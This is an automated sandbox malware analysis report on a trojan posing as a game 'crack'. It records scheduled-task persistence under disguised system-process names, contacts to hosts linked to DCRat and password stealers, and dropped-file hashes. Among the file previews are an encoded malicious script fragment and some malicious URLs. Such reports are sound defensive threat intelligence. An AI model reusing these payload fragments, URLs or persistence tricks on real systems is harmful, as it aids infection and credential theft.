            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IP | Domain | Country | ASN | ASN Name | Malicious
            23.201.248.158 | unknown | United States | 16625 | AKAMAI-ASUS | false
            104.21.68.54 | unknown | United States | 13335 | CLOUDFLARENETUS | false
            128.116.119.3 | unknown | United States | 22697 | ROBLOX-PRODUCTIONUS | false
            141.8.194.203 | unknown | Russian Federation | 35278 | SPRINTHOSTRU | false
            13.224.189.122 | unknown | United States | 16509 | AMAZON-02US | false
            Joe Sandbox version: 40.0.0 Tourmaline
            Analysis ID: 1449910
            Start date and time: 2024-05-31 02:56:09 +02:00
            Joe Sandbox product: CloudBasic
            Overall analysis duration: 0h 13m 21s
            Hypervisor based Inspection enabled: false
            Report type: full
            Cookbook file name: default.jbs
            Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed: 43
            Number of new started drivers analysed: 0
            Number of existing processes analysed: 0
            Number of existing drivers analysed: 0
            Number of injected processes analysed: 0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode: default
            Analysis stop reason: Timeout
            Sample name: RFAwChXSve.exe
            renamed because original name is a hash value
            Original Sample Name: 47CA55CDB30DB720D739BFB73504B928.exe
            Detection: MAL
            Classification: mal100.troj.evad.winEXE@52/58@0/5
            EGA Information:
            • Successful, ratio: 62.5%
            HCA Information: Failed
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Override analysis time to 240000 for current running targets taking high CPU consumption
            • Exclude process from analysis (whitelisted): Conhost.exe, SIHClient.exe
            • Execution Graph export aborted for target RDMwYUvZPK.exe, PID 1068 because it is empty
            • Execution Graph export aborted for target RDMwYUvZPK.exe, PID 5904 because it is empty
            • Execution Graph export aborted for target refdhcp.exe, PID 7660 because it is empty
            • Not all processes were analyzed, report is missing behavior information
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size getting too big, too many NtAllocateVirtualMemory calls found.
            • Report size getting too big, too many NtOpenKey calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Report size getting too big, too many NtSetInformationFile calls found.
            • Skipping network analysis since amount of network traffic is too extensive
            Time | Type | Description
            01:57:21 | Task Scheduler | Run new task: RDMwYUvZPK path: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            01:57:21 | Task Scheduler | Run new task: RDMwYUvZPKR path: "C:\Program Files (x86)\java\jre-1.8\bin\RDMwYUvZPK.exe"
            01:57:22 | Task Scheduler | Run new task: services path: "C:\Browserfont\services.exe"
            01:57:22 | Task Scheduler | Run new task: servicess path: "C:\Browserfont\services.exe"
            01:57:22 | Task Scheduler | Run new task: SgrmBroker path: "C:\AkrienAntiLeak\SgrmBroker.exe"
            01:57:22 | Task Scheduler | Run new task: SgrmBrokerS path: "C:\AkrienAntiLeak\SgrmBroker.exe"
            01:57:25 | Task Scheduler | Run new task: cmd path: "C:\Users\Public\Videos\cmd.exe"
            01:57:25 | Task Scheduler | Run new task: cmdc path: "C:\Users\Public\Videos\cmd.exe"
            01:57:26 | Task Scheduler | Run new task: Registry path: "C:\Browserfont\Registry.exe"
            01:57:26 | Task Scheduler | Run new task: RegistryR path: "C:\Browserfont\Registry.exe"
            01:57:26 | Task Scheduler | Run new task: RuntimeBroker path: "C:\Windows\en-US\RuntimeBroker.exe"
            01:57:26 | Task Scheduler | Run new task: RuntimeBrokerR path: "C:\Windows\en-US\RuntimeBroker.exe"
            20:57:32 | API Interceptor | 6072308x Sleep call for process: RDMwYUvZPK.exe modified
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            141.8.194.203 | file.exe | Get hash | malicious | PSWmarket | Browse | a0822772.xsph.ru/DLL//x64/SQLite.Interop.dll
            141.8.194.203 | gDClW9sXsf.exe | Get hash | malicious | DCRat | Browse | a0768742.xsph.ru/file2.bat
            13.224.189.122 | http://links.members.thrivent.com/ctt?m=22619476&r=NTYxNzAwMzczODg2S0&b=0&j=MjYyMTAzNzM2OAS2&k=Link31&kx=1&kt=1&kd=https://makeyourwheel.com%2fwp-content%2fupgrade%2fptilegx8%2fa2V2aW4ubGVlQHNhZGEuY29t | Get hash | malicious | Unknown | Browse | links.members.thrivent.com/ctt?m=22619476&r=NTYxNzAwMzczODg2S0&b=0&j=MjYyMTAzNzM2OAS2&k=Link31&kx=1&kt=1&kd=https://makeyourwheel.com%2fwp-content%2fupgrade%2fptilegx8%2fa2V2aW4ubGVlQHNhZGEuY29t
            No context
            Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
            No context
            No context
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (948), with no line terminators
            Category:dropped
            Size (bytes):948
            Entropy (8bit):5.906835833909567
            Encrypted:false
            SSDEEP:24:Z3UwnvfLoJZlF5emM9oLR7cb1eY7/8M4dQHz7LGlH6qfOW:9UwowmRl7coY7/8M4dQTmlH6qfOW
            MD5:E445996018C72C9251420277F18A7065
            SHA1:63B08DFA6B871C405527607A3E332A547206439C
            SHA-256:DE3A1830CABE55F45098CD92B8665960260B9986B68D2364BE164453FDFBF5FF
            SHA-512:FF357BFA22BFB308D8B96446C081C7DF8EEF260812FE9542CC0B53EA73B0C0C1E645D38B8E92927826D8A17D2B35AE0709E094820E704DAFF2E562AFE399F57A
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Users\user\AppData\Local\Temp\AkrienPremiumCrack.exe
            File Type:ASCII text, with CRLF line terminators
            Category:dropped
            Size (bytes):9
            Entropy (8bit):3.169925001442312
            Encrypted:false
            SSDEEP:3:rdo4n:m4
            MD5:B3D28C84258890625B1A64E8A9F455F5
            SHA1:86DD75E099C0F6993608893BBE7A2066CA115182
            SHA-256:788A812CD7EE8672F909278D971DACB052FA51F176B54E1144810FD24FC80D48
            SHA-512:2D5C15B51BF1492B17F66E00DF2972A77F47CAA0E35280218CBB1416A53A763B65922B1E212AC0EEDC67F735630405E620BA72631D2F13A72412BB50A1DDA4BA
            Malicious:false
            Preview:2048..yes
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (787), with no line terminators
            Category:dropped
            Size (bytes):787
            Entropy (8bit):5.902893944879972
            Encrypted:false
            SSDEEP:24:6A/V21Wcwvh+dD/jy/MJ/xHL9FeCN9yyqi/f:6A/JcaEdK/o/xzeCTyHQf
            MD5:78A4137820087EF964FA5BF12EADDBDB
            SHA1:3236C4AFA1599262288E02B18FFA3694F4CF1252
            SHA-256:6C9EEC0066D98E1E36101666443A6A0A102A3F33662369E1CA0AABD1571D545D
            SHA-512:4B04DEE4147D43D4829237EEFE59745F541B7FCCB712EA9683EA08592F7856DB19D01A957D5D88699560DFCA7F9CE17AF45A5115D070B29054F96A313A97BFF2
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (441), with no line terminators
            Category:dropped
            Size (bytes):441
            Entropy (8bit):5.836242424635494
            Encrypted:false
            SSDEEP:12:YlV5iSzz0kf5d4/Oprsitdwg8NukwSUmXyp:pSzNfWAsmHS1O
            MD5:D476D8D341169D6ACB24FF1C93CD6086
            SHA1:31FB7EF87B3D641770394DF99559F959D6AD5A54
            SHA-256:D7E16698A7C0D25440776234D9DEFAE1FAA7CCAF8DA3C087141B8803574F7B37
            SHA-512:C4B0D4E9D2A2E75878B5746B01F9134C09FD5F849773E0607F7E4457C6D184CC31E11B6387155ECE5B9A4C092DE161680C35FEAEAE8A9FB0DBE2042F467D63A6
            Malicious:false
            Preview:E8ysfA6Kqa0Cxov3h9Kcr5lmpjtyL4xwYrNyXG5F2F1M5IE8gQDLPLtJWMD6QH9vnDoFa6fbDFjmDYrhevR41mhN8EbLC9yuGFj1e8hjvlHKlHF8ffbf0E4AgaHVeUYDQzf8zzCfNrJQeWm08dqhhS4BLjVD1LFaMD3vlHIpd6SI5ofJyQXBo1g85ewQe9oBmsDad0P1VAElAvFgDMPkyDwVh50HU2LdRRgNlEq8Bfpnx58JYQMRuEMi5s3h9IgczkTsO258gQjTXJhm7qsEp3tNF7S2LI929NyNlP4gUNvde2KwKQkSZcw50FnRkCxXRqUKUUArwMtbIQtMxfs4iqcga2Xgmn6RaXLyi9b0P2gNsUxkWadEU2zkNxuc7eFIQcBvE4nxE2oqKPyFFwKLJ17hhkkvP93vxX7PTBfbwq9cOJa88oWKU38Ye
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (521), with no line terminators
            Category:dropped
            Size (bytes):521
            Entropy (8bit):5.861497637043545
            Encrypted:false
            SSDEEP:12:5XKBkfoUno8CR+CZ1GnYIChTmnxVIDJVu8gbSF0CSSx/Jr0:BjaR+CZMCsXYJo8t0yx/y
            MD5:05439657A3DCB7D2469AA32CB178001E
            SHA1:7A0147C7C9AFC3D64A44E4706743A2AE50C2ADF6
            SHA-256:4E3343919813EC0E4B095B7B05F35ED33D4525FEDFAEC101FB1178E4BC5DD9FE
            SHA-512:E2BC48E82E1C74454FD2D5943A6440313773CF5AD44038D4AA0E204185C0EBF4375F4588C801C027378810CBD7CC6D8741827A1B70B9A8B9262DEE7E287767A1
            Malicious:false
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):28
            Entropy (8bit):4.066108939837481
            Encrypted:false
            SSDEEP:3:I5XyDNH:IW
            MD5:A805BF29E1F46428832B9BC66F0A175C
            SHA1:BAEEC70E6555E17881D07267842F209F17019F91
            SHA-256:E078B7C5A7CCF4EAF88061ECA9FE5D006AC8320EAD0F0DAACB4EF4024A729702
            SHA-512:8D5769AF1C188DF3E7DD3C5405F4D035A848664AD662F03EDDA8201EFFEF92B4F952ED2CA3EF2C0DD81007A83AB8D5B1708A6A636CC8EE21EB428553AAF74072
            Malicious:false
            Preview:"C:\Browserfont\refdhcp.exe"
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:data
            Category:dropped
            Size (bytes):194
            Entropy (8bit):5.743973649370226
            Encrypted:false
            SSDEEP:6:Gt0wqK+NkLzWbHK/818nZNDd3RL1wQJRvPberBVOs:GtFMCzWLKG4d3XBJoVV9
            MD5:432F008EF219E1A3DA27D49608245EE9
            SHA1:24995DB8627B9ED98042BFD347F5664FE7AC2EFA
            SHA-256:931546A195EF9C305D0A81BA4AFB09749E64EF000BC44B4FEDF1A4CF7EB63915
            SHA-512:08F5D52B5215CA372C3B18809BF64937CEDB41E67CD4C750ACA98A031B1EE4BCBE50F9426441FCB32388822BBC08FEA53D71BB689F8CD1C5DEFE83B6F9AAEC69
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            Preview:#@~^qQAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vvT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJA.Khk+D6W.Oz4Dz}t9 8mYJB~!BP0msd+fDUAAA==^#~@.
            Process:C:\Users\user\AppData\Local\Temp\AkrienCrack.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (599), with no line terminators
            Category:dropped
            Size (bytes):599
            Entropy (8bit):5.877480945030038
            Encrypted:false
            SSDEEP:12:l+aujKfN0/izj/m+TL2/QIhAfRNnRbCQ4IlIn+DsKOhqP8Q9Gg:lwjq0avAwRvbcIC+wKSTs
            MD5:553D6AC3B92412B9B0AEAD342F069F00
            SHA1:C8287BA96EEF0D70E02DD2F678D42B3CB70EB5B1
            SHA-256:4BCADD200FC490E5411226622D4C95BF0E74672C50715E490BA8A4D7C7828D70
            SHA-512:593C17BB3A5CF76D2F9FDDAB14FE8FE5A831925F53974E5FFB0678F94BBF5F5A5F0CA714521690518765619E829949744CD75B5EA501589EBDF154E60AD0FCB5
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):235
            Entropy (8bit):5.824820039203209
            Encrypted:false
            SSDEEP:6:McA8ySdbMpPfjeSLkIs3nlfVmUP03H2fGsAZ3D:MW7db+PfjSR1EKOH2O1D
            MD5:8D22C711C1E37A2B2720950CF8C64761
            SHA1:E34520B359AC9A281760C30D0774D0CCA4EF3E9A
            SHA-256:26D4C4D9404EEE139593441BFAF0BA173F17F87025108E3140B733E3179EA59A
            SHA-512:7CDECAFF4C4F2BAD8A36A647ED1F2CA8828B2A8904073A880A709A73CFF566D08B74BE7260E411245FFC5BA108F65C3BE655C85DBE5CEA3B3A2F74A2788C5F12
            Malicious:false
            Preview:IPE7Z1FKbXHZbwZqsdVoTAuqjNKxJSCE3V828yZZ9bHkzEQq3xnU7Y4IeYYMqSAJUDfGxhs3D6o13J1e7e4WpsGea0XkaNsrb7QwiK2WFtRBuDOVg3PLYodm6Bp6JIc0O6a53E6wmhQ5bFuXlCDh8gTxenzhe5N7RawxmTbb7cj0XiL1QRVGE52rnnbPPYRqUToAS6vSllkf7cZ5c7RNkG2ViFJ82MMiK3fD3KjTgCf
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (434), with no line terminators
            Category:dropped
            Size (bytes):434
            Entropy (8bit):5.872859755194694
            Encrypted:false
            SSDEEP:12:/1GYPcmzkKkCqB/SSHn0pUd2xij8coIScxwCWG:/1G2cOkKHE0UR8cMr+
            MD5:5ABCAD4F18448D1FBCAD5575F4175E12
            SHA1:70A980FA9C063B21619BA035D573B2505DBCA384
            SHA-256:129062A0E3DD88D88224C79F2F7949BBD04C13C4838283AC8D4B4D5FF6E48C4B
            SHA-512:6E9018376387542128B924BC58DB7CD0533CDB21203B0D5BAF9A04AA3078C9593B6756405F0DDEEFFABC83634F3E38B5850F509704CCC2C33D8DE3E66C3AFE32
            Malicious:false
            Preview:2q2UvyNOX40V3M1JuBPTebJAfXrkHywFCid3sHH1zePSXXPfXMewxz5ag2yXHmHjIvSVs7bm4YdAM1mIIMN4T9RNmCX0StuNXpKmE3wav12ZW4OpPqO5ZMPIdFspkkUKoQnhqAEPZwJcH21ryrkmfzxKZBI8KG0KhrvFRq8Pl9fmCxAkOA12ArpyccHp1FES695aHvaItVAfTLImAhuKP8KzB6nyjTXg5MqD1kddksJprJfRUfoTU4D8zFYLIljZ7dkGeEuaERjgyeI1aVeDoELAJsOwMSV8JtsNjYwPuOPDUgJU7guwHfu3Sj7w08Nw6lWFw4SCjOSayIqmi3ypii0o8y59a9YwAdGtKEhCOrM2MUEJ3VO6KiNXusG79TljzgaVB7ceWvb0W7bouvFFvcmcPt8b7jD4FmDq4tH62tkYGXBwQc
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (507), with no line terminators
            Category:dropped
            Size (bytes):507
            Entropy (8bit):5.857028423164222
            Encrypted:false
            SSDEEP:12:OyUvt6M/q/2CVzIanMAmOsd0+iMnnryUOI0ab:3m/q+CCLAHJ+iMnnr1Ok
            MD5:40EE6C601EF9CE7D5259AD94AA07EAC5
            SHA1:38A8951C674032A1DC369CCC0D8B9D7E659F00B4
            SHA-256:B8AA787DA2EBDF37698B9F25353FB0A117AFCFFAA1763032B54FF01EEEE41B38
            SHA-512:7DECD9134756404F17DA16DF5C5B5F3188B4B57371B87F5925C6225C67B4EC8C64FAF197A4BC5DBA749F7270CCFA8631E2388732A79D98C3939698BEA37C3975
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (613), with no line terminators
            Category:dropped
            Size (bytes):613
            Entropy (8bit):5.85439748006148
            Encrypted:false
            SSDEEP:12:0hFA6HmYxDmm3/3cmyXzQ3KWSCShtINCIY3Qr8YtGgb7UYgdP0AwH2L:H6HmYxDr3/3c7zMSzhtI7YAVGgFgRl
            MD5:217119E3A1D8A722AF7DEF05A433814A
            SHA1:31F6618FEBC66F139E007D5894F74C176E434736
            SHA-256:33CE25F3CACA5289C95C5282B943B92EF0C0AA997705705FA1B659B7A9D5EA19
            SHA-512:2216D9BC2E63CEAF4CD83FD16448DADCC750FCBCF5D81C0D885627CF39E06E86C9DDF88FDFBB7FA3F5D154257FCCE46471BD1FA8F5D6D3529CE4ECD4B955DD94
            Malicious:false
            Process:C:\Browserfont\refdhcp.exe
            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
            Category:dropped
            Size (bytes):847360
            Entropy (8bit):6.081184207528029
            Encrypted:false
            SSDEEP:12288:7f+nSU0jXIzPk1zfnXX695aByBtOCDLRkiBI9GdM:TpTjXIzPkxnXX6WAHOcaiOGdM
            MD5:EF0F547DFEF34380202700FDEDDC1CC8
            SHA1:7BEEA5749F899D22F2270D317F48A4C049BF2C9E
            SHA-256:73FF007B685023EAD1E8A9840B6717F2B3CEDD1D005CE578106E08BAE0AFDF43
            SHA-512:DB290993A402BD976EDDA0DD8597F736C844D064E3096C8F0AD5E1CEB43FD2892D79BA587E24CDEC31DAE3F9645571FDA8E55D62B105C03E2DF8CA3D7C3E5417
            Malicious:true
            Antivirus:
            • Antivirus: Avira, Detection: 100%
            • Antivirus: Joe Sandbox ML, Detection: 100%
            • Antivirus: ReversingLabs, Detection: 88%
            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rb.....................6........... ........@.. .......................`............@.................................p...K.... .......................@....................................................... ............... ..H............text....... ...................... ..`.sdata.../.......0..................@....rsrc........ ......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):299
            Entropy (8bit):5.830864611308403
            Encrypted:false
            SSDEEP:6:5Eu4szPEpCThFdJL465U63OSmfBdIi0QLGCVM8RaH/xRRpe84mjk8iQR:yPUNFrfu63ODfbLGCrRa5npjrjk8iQR
            MD5:878A83980EAADB36E4F41A345BD04B01
            SHA1:8DFD936811D8B2A490D2E1445F4CD538E1CFBC44
            SHA-256:55C779FFE9B665A11211614EA3BF8FF9A64FB76CCC5B896F641D6CDEEB422B66
            SHA-512:2CCE7989C6D1C08594390E1E214D854B1CF4A1C89BB5EF3790567AB9BBA256F9FB1C5A38A8FCCEBE39AEEAC9AB4DA69C2F447162174B6DBEBB085E4FC945C7D2
            Malicious:false
            Preview:8Ahwsgut4vuAoJNB1NV2sLKfWzrjypv6oz71MyqkmS2fsMjDTwfqmNkwzCZ2yL4O9xWyLVyDhvPaTpwJQnQBKEUaPLBKYxvbXnf40v177bJ18JcKPPmK43E5d5iATopt9xDqK1TfwSDs5dcFs15ILkgdijb4M1oTwa1KGw9X6GYm0V99ddSbtghYRjHkZZS4nu6elS852hMFM3nNkbbtiMkP3d3hoY7gxe8FZfYLeWjLTcMX64A78jVbJqlHYbQdjqRs5hxEDQPMnY5bRgluXAiOIh6s3QwCFFmnKebYG54
            Process:C:\Browserfont\refdhcp.exe
            File Type:ASCII text, with very long lines (303), with no line terminators
            Category:dropped
            Size (bytes):303
            Entropy (8bit):5.8148657978349085
            Encrypted:false
            SSDEEP:6:7DXBBLvbCVAIhI1ki/Z92o6P1nVRLK3G+1gEnG4QABceHGtsXgoPn:7LBB1cEd2xR7LK3h1gEnZQSHGtO
            MD5:A9CA56847D6D31609E2CE5DA2F53F398
            SHA1:BC1A2EFA9BB3FDB59AC0114BA6E160456E8C646D
            SHA-256:8A48FC750D03D0757FB7ABB15CE0896B7395B11E6569316C9A7A832D0B87AECE
            SHA-512:F3E4A184F5C5887D9EDB0447379FA58347A3C7F4FE3C59F406C4DAEBD070C261B46AAE69A85285F2402AEDA0FF95E5DAC8D83C375C1D504D3C82DDA1387EEC96
            Malicious:false
            Preview:CwDoafzVURx9ZgqkdQyIYnonJX9nl59Y8R0gfwHUyxQpcDR0blKdSg3YIZeDgMtZSZAIqKFqIdTlX9LGGJM9ufGbYbXFSEymD0XCCJKQfeVyMSAJOX7WAtpwTiuOwAYDorhgmIE695ePKRPFaO04HbmTLktdZ5deGRJfuegGTAXEPZlBToxiJd6NEOVBYlhDb9J3HuV6rukHEhEv8rJvI5VmU6afJfrscUnPQs4jS10Z3zIhKjCqbw5fogiKT0wMC2ou4yeQxkdQE6tfy2VkcARqYHluJtPcEoWALYnVEv30Tpa
            Process:C:\Program Files (x86)\Java\jre-1.8\bin\RDMwYUvZPK.exe
            File Type:CSV text
            Category:dropped
            Size (bytes):1281
            Entropy (8bit):5.370111951859942
            Encrypted:false
